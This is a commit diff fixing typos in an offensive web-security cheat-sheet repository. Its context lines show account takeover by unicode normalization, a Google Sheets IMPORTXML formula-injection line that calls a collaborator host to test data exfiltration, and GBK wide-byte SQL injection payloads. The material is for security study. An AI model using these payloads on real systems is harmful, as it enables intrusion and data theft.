Merge pull request swisskyrepo#787 from clemensGooooo/master

swisskyrepo · web-flow · commit 178949896f97 · 2025-07-29T19:09:56.000+02:00
Fixed several typos
diff --git a/Account Takeover/README.md b/Account Takeover/README.md
@@ -13,7 +13,7 @@
     * [Leaking Password Reset Token](#leaking-password-reset-token)
     * [Password Reset via Username Collision](#password-reset-via-username-collision)
     * [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
-* [Account Takeover via Web Vulneralities](#account-takeover-via-web-vulneralities)
+* [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities)
     * [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
     * [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
     * [Account Takeover via CSRF](#account-takeover-via-csrf)
@@ -110,7 +110,7 @@ See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
 
 ### Account Takeover Due To Unicode Normalization Issue
 
-When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur.  
+When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur.  
 
 * Victim account: `demo@gmail.com`
 * Attacker account: `demⓞ@gmail.com`
@@ -119,7 +119,7 @@ When processing user input involving unicode for case mapping or normalisation,
 
 [Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
 
-## Account Takeover via Web Vulneralities
+## Account Takeover via Web Vulnerabilities
 
 ### Account Takeover via Cross Site Scripting
 
diff --git a/CSV Injection/README.md b/CSV Injection/README.md
@@ -65,7 +65,7 @@ Technical details of the above payloads:
 
 ### Google Sheets
 
-Google Sheets allows some additionnal formulas that are able to fetch remote URLs:
+Google Sheets allows some additional formulas that are able to fetch remote URLs:
 
 * [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale)
 * [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string)
@@ -79,7 +79,7 @@ So one can test blind formula injection or a potential for data exfiltration wit
 =IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
 ```
 
-Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization.
+Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.
 
 ## References
 
diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md
@@ -188,7 +188,7 @@ Creating your own randomness algorithm is generally not recommended. Below are s
 
 ### Tools
 
-Generic identification and sandwitch attack:
+Generic identification and sandwich attack:
 
 * [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources
 
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
@@ -718,7 +718,7 @@ Wide byte injection is a specific type of SQL injection attack that targets appl
 
 The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code.
 
-Several characters can be used to triger the injection.
+Several characters can be used to trigger the injection.
 
 * `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string.
 * `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence.
@@ -756,7 +756,7 @@ For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in t
 
 However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
 
-In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection.
+In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape character, allowing for SQL injection.
 
 Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.
 
